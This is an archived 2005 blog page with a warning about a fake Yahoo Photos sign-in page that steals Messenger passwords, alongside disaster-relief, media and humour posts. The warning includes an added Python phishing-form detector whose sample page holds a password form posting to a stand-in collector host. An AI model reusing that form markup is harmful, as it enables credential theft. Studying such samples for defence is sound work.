Sunday, 30 October 2005

Yahoo password hack warning

Actually, make that:

Yahoo Messenger password scam warning



Note: I have kept the earlier, inaccurate, post title because this post gets a lot of traffic via search and has been linked to here and there, so I don't want to change the permalink. Though I hope the subhead in larger type makes things clearer.

It happens via Yahoo messenger.

You get a message, apparently from someone on your list. So far, I haven't been able to check if it's someone who's fallen for this, and whose account is being used, or a spoofed send.

The message is something along the lines of "see my new pictures." With a Geocities link. When you go to the link, even if you don't know that Geocities is a home page provider and that it was bought over by Yahoo many years ago, you see the reassuring "yahoo" in the URL, a Yahoo logo alongside the Geocities logo, and what looks like a Yahoo photos page that asks you to log in before you can proceed. All the links work, and go to genuine Geocities sign up, Terms and Conditions, Privacy Policies, etc. Except that you don't need a password to view a Geocities page. (Well, yes, you might, if the page owner has locked some pages behind a javascripty thingy or summat, but you won't need to put in your Yahoo password.)

Proof? Just dump in any arbit name and password. It will seem to accept it (if you look quickly at your status bar, you'll see the page sending to another site).

Just a little while ago, I got what looked like a message from a pal. It didn't sound like him in the least, so my antennae were up. (Besides, a friend told me a few days ago she'd just got hit by a password-stealer, so I guess I was a little wary.)

Clicked the link, and it was as I described it above. Here it is: http://www.geocities.com/hot_pretty_belle/

And in case it's not up, here's a screen grab:



I did a little "view source" and here's what the form looks like underneath the hood. (I have the complete page saved, if one of you techwizards wants it. Just get in touch.)

*see update 2 below


(If the code in the image doesn't make sense to you, here's the skinny: when you hit "enter", the page sends your Yahoo ID and password to hot_pretty_belle, or whoever else has set up the page.)

Now that you know, want to have a little fun? Fill in username and password fields with language mama would have washed your mouth out with soap for. And hit enter. hot_pretty_belle (or whoever you next encounter trying this stunt) will get lots of piping hot email.

Be warned. You'll get another page offering you another sign in button. And a Sign Up button, which, on click, gives you a genuine-looking Yahoo sign up page. Just look up at the URL. Too tired to go see that bit of source code now, so will leave it to you tech-adepts.

I'm going to wait a day before reporting this to Yahoo, so go send that hot_pretty_belle your love!

And do pass this on. No, you don't need to credit me. Well, if you insist. I'm a slut for link love.

Update 1

Did a bit of research, and found out what happens if you enter a genuine Yahoo ID and password and click through.

The page records your ID and password, then forwards you to the real Yahoo Photos site. You (: if you hadn't read this :) would have just muttered imprecations about the dorkiness of the pal who didn't give you proper links.

And a few minutes later, you would have got a message from Y!M saying "You have been signed off Yahoo because you signed in from another location."

This has been happening quite often, so there's not much point remembering specific URLs, like hot_pretty_belle. Just remember the method.
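The method comes down to a password form sitting on a host that is not Yahoo's sign-in host and submitting somewhere other than the page it is on. The following is an added example, not code from the original post, that checks saved page source for exactly that; the trusted host list, the sample markup and the `pages.example` / `collector.example` names are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption for this example: the only host allowed to ask for the password.
TRUSTED_LOGIN_HOSTS = {"login.yahoo.com"}


class PasswordFormCollector(HTMLParser):
    """Collect every <form> and note whether it holds an <input type="password">."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open_form = {"action": attrs.get("action") or "",
                               "has_password": False}
            self.forms.append(self._open_form)
        elif tag == "input" and self._open_form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open_form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def audit_login_forms(page_url, html):
    """Return one finding per password form that should not be trusted."""
    collector = PasswordFormCollector()
    collector.feed(html)
    collector.close()
    page_host = urlparse(page_url).hostname
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # An empty action posts back to the page itself.
        target = urljoin(page_url, form["action"])
        parsed = urlparse(target)
        reasons = []
        # Exact host match: "yahoo" appearing somewhere in the URL proves nothing.
        if page_host not in TRUSTED_LOGIN_HOSTS:
            reasons.append("password requested on untrusted host " + str(page_host))
        if parsed.scheme == "mailto":
            reasons.append("form mails the credentials")
        elif parsed.hostname != page_host:
            reasons.append("form submits off-site to " + str(parsed.hostname))
        if reasons:
            findings.append({"target": target, "reasons": reasons})
    return findings


# Constructed sample: a look-alike sign-in page on a free home page host.
LOOKALIKE_URL = "http://pages.example/yahoo_photos_login/"
LOOKALIKE_PAGE = """<html><body><img src="yahoo_logo.gif" alt="Yahoo! Photos">
<form method="post" action="http://collector.example/cgi-bin/formmail">
  <input type="text" name="login"><input type="password" name="passwd">
  <input type="submit" value="Sign In"></form>
<a href="/terms.html">Terms of Service</a></body></html>"""

# Constructed sample: a sign-in form served by the trusted host, posting to itself.
GENUINE_URL = "https://login.yahoo.com/"
GENUINE_PAGE = """<form method="post" action="/signin">
  <input type="text" name="login"><input type="password" name="passwd"></form>"""

if __name__ == "__main__":
    for finding in audit_login_forms(LOOKALIKE_URL, LOOKALIKE_PAGE):
        print(finding["target"])
        for reason in finding["reasons"]:
            print("  -", reason)
```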

Update 2

Thanks to ViswaPrabha and Prashanth, who told the doofus - me - that even with angle brackets html-ised to show up on the page, the script would send comments on this post (and possibly blogger ID and password! shudder!) to the black hats who run the page I referred to. So, text removed and replaced with an image, and now it will behave like a normal, harmless blogger page.

I, for once, am glad that no one commented!

Many Thanks, VP and Prashanth.

Update 2 - 9th July 2006
Please see this diary entry at SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System and this entry on the McAfee Avert Labs Blog. The SANS page points out a development that didn't exist when I wrote this post:
The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this.
And the McAfee page points to this discussion on Broadband Reports, which also mentions the encrypted page.

Delhi Blasts - 2

Rediff says "the Union Health Ministry has set up a control room to ensure speedy treatment to those injured. The control room can be reached at 011-23061302."

Please don't swamp that number with calls unnecessarily.

And the Chief Minister advises people to stay away from the markets.

Delhi bomb explosions

At least three explosions in crowded market areas in Delhi are reported to have killed at least 21 people.

Blasts were reported in Paharganj, near New Delhi railway station, Sarojini Nagar and Govindpuri. And a bomb was found and defused at Chandni Chowk.

Here's the BBC, Rediff, Indian Express, Hindustan Times, Reuters, The Hindu, Times of India, Outlook, NDTV.
Update
The injured have been moved to Dr Ram Manohar Lohia Hospital, Baba Kharak Singh Marg, Near Gole Dakkhana, New Delhi-1. (ph: +91 11 23365525, 23361948) and Safdarjang Hospital, Aurobindo Marg, South Delhi (ph: +91 11 26165060, 2665032, 26168336, 26864865).

[From the Delhi Government's Hospitals in Delhi Page and Sify.]

Alea jacta est. Nunc est bibendum

Remember all those Latin expressions in the Asterix comics? Mainly from the old peg-legged pirate as the ship went down? Did you understand them all? Didja? Huh? Didja? Honest? Sind Sie sicher? Eerlijk? Absolument? (Darn. The Babel Fish doesn't do Czech.)

We have a swollen head, we do.

So no one's written us an ode. No sonnets or songs about us, no portraits or statues in public places, no fan sites, no groupies.

But we're quite tickled about this.

Friday, 28 October 2005

And now for the audio-visual round

Pal and colleague, J Krishnamurthi (a.k.a. JK a.k.a. Jakes), quizzer, quizmaster, techie and atrocious pun perpetrator has succumbed to the siren song of the blogosphere and set up not one but two blogs.

In Quizerati, he and his pals from Quizness will discourse knowledgeably on:
A. Quizzes
B. Quizzers
C. Mallika Sherawat
D. All of the Above.

And on Musings of the completely jobless, he will talk about (going by current evidence):
A. Mallika Sherawat
B. Mallika Sherawat
C. Mallika Sherawat
D. Mallika Sherawat

Right. Do you need a lifeline?

Chennai update

Please see Chennai Help, where suman kumar, Chenthil, Ravages, Echo and Kaps are putting together information on the heavy rain and floods the city has been experiencing. From what I saw on TV a little while ago, it could get worse. There's a cyclone approaching, and Ongole, to the north, in Andhra Pradesh, is right in its path.

Man, talk about a year for disasters!

Thursday, 27 October 2005

The Chennai floods

Via email from AID:

A team of volunteers from the AID Chennai office, headed by Damu, is already traveling (through some of the safer roads by four-wheeler) and assessing the damage in some of the slums in Chennai, inspite of the heavy rains outside!

Ph numbers to contact:
AID Chennai office: 044-28350403,
Damodharan: 94442 41918
Balaji Sampath: 94440 61033
Chandra: 93823 30752
Ravishankar: 94440 84910

Hi all,

Heavy rains have been lashing chennai+other areas in TN, neighboring states for the past few days. Balaji was in Nagai yesterday and has visited many of the affected coastal areas on the way back to Chennai.
There are different categories of affected people:

(i) People facing difficulty in getting to work, accessing amenities, people who might lose their business, or worse their entire crop
(ii) Water entering people's houses and their having to evacuate to friends' houses
(iii) People living in thatched houses losing their homes and possessions

As of now, AID-TN is trying to work with the third category of people - they are among the poorest and most in need of help. The Chennai corporation has arranged for some of them to be shifted to nearby schools. In other areas of TN too, a lot of work is required in this regard. We are planning to concentrate our work in the following areas where we are working already (both coastal and otherwise):
Vembakkam (Tiruvannamalai district)
Sulagiri (krishnagiri)
Bhuvanagiri (Cuddalore)
Koovathur (tsunami affected cluster, Kanchipuram) and
Chennai.

Most of us are staying home and co-ordinating over the phone. A team of volunteers from the AID Chennai office, headed by Damu, is already traveling (through some of the safer roads by four-wheeler) and assessing the damage in some of the slums in Chennai, inspite of the heavy rains outside! We plan to focus on the following:
(i) Immediate housing needs
(ii) Basic relief - food and water
(iii) Clothing requirements -
- Sweaters, jackets, blankets, bedsheets
- Children's clothes, both boys and girls
- Sarees, since they can be used for multiple purposes in such
situations (for ex: as screens for women in make-shift camps)

We request people to drop off sweaters, blankets and bedsheets and ONLY THE ABOVE CATEGORY OF CLOTHES at the AID office, when possible. We will also be collecting donations for providing relief supplies and housing assistance.

We will keep you updated.

Ph numbers to contact:
AID Chennai office: 044-28350403,
Damodharan: 94442 41918
Balaji Sampath: 94440 61033
Chandra: 93823 30752
Ravishankar: 94440 84910

Thanks.
-Ravishankar

More on IIPM v/s the blogs

In India, you might think that if you buy enough newspaper ads, those same newspapers won't bother to check the claims you make in those ads. The papers wouldn't want to lose ad money, right? But that old equation is changing, thanks to one scrappy youth magazine called JAM and the collective investigative strength of the Indian blogosphere.
Read the rest of Mark Glaser's piece on the IIPM's tiff with the blog world here, on Online Journalism Review. Glaser also wrote about the mediaah! affair in March, and OJR's Shefali Srinivas reported the Citizen Journalist response to the December earthquake and tsunami.

back to the future

Have you noticed this?

All the young 'uns carry haversacks these days.

And all of them wear the straps extended to their maximum, so that the bag hangs really low, butt level or thereabouts.

(Decidedly unergonomic, and also bad for their backs, except bags are never packed full - about three slim books and pencil box or whatever it is they carry in them seems to be the load.)

So is this Generation Zed's version of this blog's contemporaries' expression of our individuality: every one of us wearing our caps backwards, never mind about the sun in our eyes?

Sir Harold and Sir Arthur on Citizen Journalism and Blogging

A couple of extracts from Outlook's Tenth Anniversary Issue
Do you think the rise of ‘Citizen Journalism’, with blogging being one element of it, represents a diminishing trust in the established media? How can news organisations go about building credibility in the eyes of readers, viewers and listeners?

Established media has lost some trust, no doubt, but I think the rise of blogging is more to do with the appetite for telling the world where to get off. Very healthy. Most of it is opinion/argument, which is fine, but there is no central organising intelligence to sustain the heart of journalism which is reporting. (And sometimes that reporting is too difficult, too urgent, to leave to one reporter). Indeed, a significant proportion of cyberspace perpetuates myth and falsehood. The absurd lie that Jews blew up the World Trade Center on 9/11 began life on the web and got endlessly recycled by the credulous, the ignorant and the malevolent. One of the tasks I would submit to mainstream media is the regular detection and exposure of cyber propaganda.
From an interview with Sir Harold Evans, Former Editor, the Sunday Times, London, Former Editor-in-Chief, Atlantic Monthly Press, President and Publisher, Random House, Author, of Good Times, Bad Times, voted the Editor of the Century in 2002.
Blogs, wikis and citizen journalism are all signs of things to come.

This has far-reaching implications. For one thing, it allows far higher levels of interactivity and audience engagement than has been possible in newspapers, radio or television. Even more importantly, the web provides a platform for small-time companies, organisations and single individuals to disseminate ideas, analyses and viewpoints to a potentially global audience. And it can be done at a fraction of the cost of launching mainstream media outlets. While the web is not yet a level playing field and has its own limitations, it has already triggered the end of absolute power enjoyed by press barons and gatekeeper editors.

Nowhere is this breach more apparent than in the remarkably swift rise of bloggers. Their publishing of online diaries has shown how passionate individuals can command attention and influence way beyond their professional or social circles. John Naughton, a noted British chronicler of the new media, says the web has again demonstrated its capacity to unleash disruptive innovation on a complacent establishment. As he wrote in 2003, "The response of the ‘professional’ media to this explosion has been interesting. First there was patronising incredulity that people would write without being paid for it. Then there was disdain. ‘Where’, asked the hacks, ‘was the quality control?’ Surely the whole thing was just an epidemic of vanity publishing. Then there was unease, fuelled by the realisation that (a) large numbers of bloggers were talking to one another behind the media’s back, as it were, and (b) some of them knew more about many subjects than most journalists. Badly researched or ideologically skewed reporting was being instantly skewered by bloggers...."

Naughton has documented many instances where poor journalism about highly technical or complicated issues was exposed by bloggers. The Columbia space shuttle disaster was one, where half-baked journalistic theories were effortlessly demolished by bloggers with serious aerospace expertise.

The blogging community has refused to accept the news ‘agenda’ as determined by the mainstream media. As Naughton says, "This has been increasingly evident since 9/11 as the established US media have dumbed down their discussion of the issues surrounding security, civil liberties and Bush’s policy towards Iraq. It would not be much of an exaggeration to say that (with a few honourable exceptions) most of the serious discussion of these issues in the US at the moment is happening in weblogs and not in the ‘official’ mass media."

It’s too soon to tell how much and how far bloggers could act as a countervailing force for the lapses and excesses in the mainstream media not just in the US, but across the world. We can only hope that the bloggers will push the mainstream to embrace long overdue reforms to become more transparent and accountable—the very virtues that editorialists constantly preach to the world’s governments and corporations.
From Arise, Citizen Journalist!, by Sir Arthur C Clarke, SciFi legend, the man who predicted geostationary satellites in one of his stories, and inspired Tim Berners-Lee to invent the World Wide Web with another.
[Cross-posted at indi³.]

Wednesday, 26 October 2005

Blog Quake Day



We did it in the IIPM scrap.

Before that, the blog world truly came of age (IMAO), to support the TsunamiHelp effort.

Now, it's time to band together for Blog Quake Day.

Do a post. Link to a charity or NGO you support (you can find many on Quake Help). Encourage your readers to make a donation. Give some yourself.

DesiPundit, who issued the call, has a link roundup posted here.

Tuesday, 25 October 2005

Best of Blogs

At the 2005 BOBs, the South-East Asia Earthquake And Tsunami blog has nominations in the categories Best Journalistic Blog - English, and Best Weblog.

Go here (and send your friends too) to vote: http://www.thebobs.com/thebobs05/bob.php?site=vote

And here to see the current status: http://www.thebobs.com/thebobs05/bob.php?site=nominate_result

Voting closes 20th November.

Competition for Google Earth?

We were doing a little research for a column and stumbled on NASA's open source World Wind and MSN's Virtual Earth. Must do a comparison this week.

Ooh, the irony.

From the Outlook story on IIPM: "Dan Rather, the blogger..."

Heh.

Saturday, 22 October 2005

Doggerel for Caferati, and everyone else who craves feedback

A word of explanation. On Caferati's Ryze message board, there's often much wailing and beating of breasts about lack of feedback on deathless prose and immortal verse. And that plaintive cry frequently echoes down the corridors of the blogosphere too. Sure, I've felt too - in both arenas - that I could use a lot more feedback than I get. But if there's one thing blogging has taught me, it's that you better do it because you like it, not because it's an instant ticket to an interactive audience.

This might just as well have been called "Blogging Blues." :)


Doggerel for Caferati

You can sing the blues,
You can pay your dues,
You can try, and still lose,
There's no "money back."

Yeah.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

You can be bold, shy,
You can despair, cry,
You can ask God why.
But you can't do jack.

Sad.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

You can do it all right,
You can fight the good fight,
You can spend lonely nights
Put your head on the tracks.

But.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

Gotta tell you this, baby:
You gotta do it for free,
There are no guarantees
For love and feedback.

No.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

We'll settle for brain dead, though

Apparently USA presidents starting their terms in years ending with zero are kinda jinxed. Ronnie survived. Sigh.

[insert obligatory "suitable something" pun here]

Sonia was at the Two Lives reading in Bombay, and has a hilarious post up here. [Now we have to cadge an invitation to her beer-and-olives party.]

And The Duck was at the Delhi soirée, where more fun was had by all. [Aside: we have only met the quacker and the Jabberwock at Hurree Babu's durbar, where the lads behave most decorously. Clearly one must accompany them to book launches instead.]

Sniff. No one invites us to these things either. Ah well.

Friday, 21 October 2005

Right to Blog for Awareness Petition

We haven't written about the whole IIPM thing, but so many others have, eloquently, and to far, far, far, far, far larger audiences than frequent this blog. P'raps we'll post at some length on this later, or at least post you some links, but in the meanwhile, we urge you to go read, and if you agree, sign the Right to Blog for Awareness Petition.

Thank You.

p.s. We just discovered that there's already another, somewhat more strident petition up, which you can read and sign here.

Ahem

This just arrived via snail mail. We had heard about it via email ages ago, of course, and yes, we know that we shouldn't be so pleased with a piece of paper recognising a digital effort in a digital age, but nevertheless....

Prixars 2005 Honorary Mention

Wednesday, 19 October 2005

Oh that Georgie

The things he gets himself into. (And refresh the page for more variations. Hours of good clean fun.) [Thanks Anjana.]

Tuesday, 18 October 2005

So who are one's real friends then?

Give us a free ticket to this and prove it, okay?

Thursday, 13 October 2005

My Live Journal

Today was really tiring.

I got out of bed really late because my alarm clock has broken and I cannot afford a new one at the moment.

I feel sad, because Sarah and Britney are complete bitches. They told everyone I have an STD, just because I slept with both of their boyfriends on Saturday night.

I'm so hardcore. Me and Buzz went to the mall today, and I stole a whole heap of stuff. I got a Good Charlotte CD, a couple of DVDs and some new boots. Buzz got caught, but he fought his way out, and then we stole some lady's car and smashed it into a phone booth.

Last night I had to go and pay Joshua's bail. He's such a jerk. He got arrested for punching the Walmart clerk in the face for refusing to sell him beer. He's only 16!

I want to tell the world that my girlfriend Amy is the bomb! She made pizza last night, and even though I burnt my lips on the cheese, it was awesome!!!

I am really annoyed with those assholes at _are_you_hotter_than_us_?, because I am so much cuter than them, and those photos don't do me justice. They can't reject me, so I'm starting my own rating community. Click here to join (the first five applicants are automatically accepted).

Today, I got a digital camera! Yes! Here's some photos of my girlfriend in the nude (but don't tell her that I've posted them here - she'll kill me! Har har.)

I want to say thanks to my dad for giving me my own computer and digital camera. Here's a photo of my room. The weather in Ontario is cold. I have nothing more to say.

I went to the doctor yesterday, and he said I have bipolar disorder, which makes me different enough to be interesting, but the same as all the other cool people with bipolar disorder.

You should all do this quiz! It's amazingly accurate. You just put in your name and birthday, and it will tell you what your favourite sexual position is.

Yawn.

That's enough for now. But I'll leave you with this poem I wrote. It's about my friend Robert, who has bipolar disorder. Just like me. And Heidi.

Created with the Gregor's Semi-Automatic LiveJournal Updater™. Update your journal today!
Powered by Rum and Monkey

Monday, 10 October 2005

WorldWideHelp

The idea is that any time there's a disaster, any member of the group can alert a ready-made team, all of them with experience in the field, enthusiasm and goodwill, and request help to get something going.

Once the actual project takes shape, the individuals involved may decide to form a separate coordination group to run things.

The other part of the agenda is that we can exchange info, learn from the things we did wrong, and get better each time the sad, but inevitable happens.

I'd love to send you all individual invitations, but aside from the time it would take, it would also mean that your invitations would go into automatic human review by googlegroups, and that can take ages. It's much quicker to tell you about it!

Group Page:
http://groups.google.com/group/WorldWideHelp
Group description:
General newsgroup and rallying point for power bloggers, wiki experts, database adepts, etc, for calls to action and volunteers to provide information post-disasters.
Will also be used to exchange information in more peaceful times, so we can all learn from our experiences.

Join This Group question:
Please tell us which online relief efforts you have participated in, and your strengths (eg. blogging, wikis, databases, tech innovation, hosting, sponsorship, etc).

Go here to send in a join request.

Sunday, 9 October 2005

South Asia Quake

The SEA-EAT team has started South Asia Quake Help to get out news and information about resources, aid, donations and volunteer efforts after the Earthquake of October 8th, 2005.

Please visit, link to and mail your friends about it. The URL: http://quakehelp.blogspot.com/

Friday, 7 October 2005

This one's for me

Also via Karmayog:
NAMI walk for Mentally Ill - NCPA to Oxford Bookstore

Oxford Bookstore in association with NAMI India and Karmayog.com invite you to celebrate

World Mental Health Day

Walk from NCPA to Oxford Bookstore

ANJALI CHABARIA will be present to conduct an interactive session on the theme

9th October 2005 Sunday
9:30 a.m.- The walk begins
10.30 a.m. – Join us for the talk at Oxford Bookstore

Oxford Bookstore
Apeejay House
3, Dinsha Vachha Road
Churchgate, Mumbai 20
RSVP: John at 98201-55591

~Program Sponsors~
Sun Pharma
NAMI INDIA

Sue 'em

Via a Karmayog newsletter:
MUMBAI ROADS OR CRATERS ON THE MOON

The condition of Mumbai roads is pitiable and the authorities responsible for maintaining good roads i.e. BMC, PWD, MMRDA, MHADA, Dairy Development Dept., Mumbai Port Trust & Ors. have failed to provide good roads, despite spending crores of rupees of tax-payers' monies. Citizen is a helpless victim of the bad roads and the infants, elderly, infirm and pregnant ladies continue to bear the brunt of bad roads.

I am pursuing a Suo Motu Writ Petition no. 3 of 2005 in the High Court at Mumbai before the Hon'ble Chief Justice.

During the last hearing on 26th Sept., BMC's Counsel Mr. K. K. Singhvi contended that except few roads, which are damaged by unprecedented rains this year, everything else is fine !

Mr. Singhvi also contended that the reports in the Media are all exaggerated! Of course, when I contended that are the photographs also exaggerated, Mr. Singhvi had no answer !

BMC & other authorities responsible for the roads have the tax-payers monies at their disposal to engage Senior Counsel/s while I am doing this at my own costs, time & efforts; an unequal fight.

Court has now directed us to submit specific examples of bad roads i.e. name & address of portion of the road which is bad, the nature of defect i.e. sunken/cracked/pot holes or any other defects, etc.

We therefore seek cooperation of the Citizens of Greater Mumbai to inform us, details of such roads with exact location & nature of defect, either on email or by letter, at the following address:

Kewal Semlani,
Postbox 11688, Nariman Point, Mumbai 400021
E-mail: mumbairoads@mahadhikar.org

This PIL is for your good and if you do not act now, you will continue to suffer from bad roads, year after year. Naturally, this will also result in the tax-payers hard earned monies being wasted.

WAKE-UP NOW OR KEEP ON SUFFERING !

Kewal Semlani

Wednesday, 5 October 2005

Not on the furniture

Go here, pick an item, choose from the five ready to, er, go options, or make up your own, with the, ahem, arrangements that suit you best. [Not while the kids are around, okay?]

Saturday, 1 October 2005

And they call me potty-mouthed

Really now, fellas, would you be able to let it all hang out in front of one of these?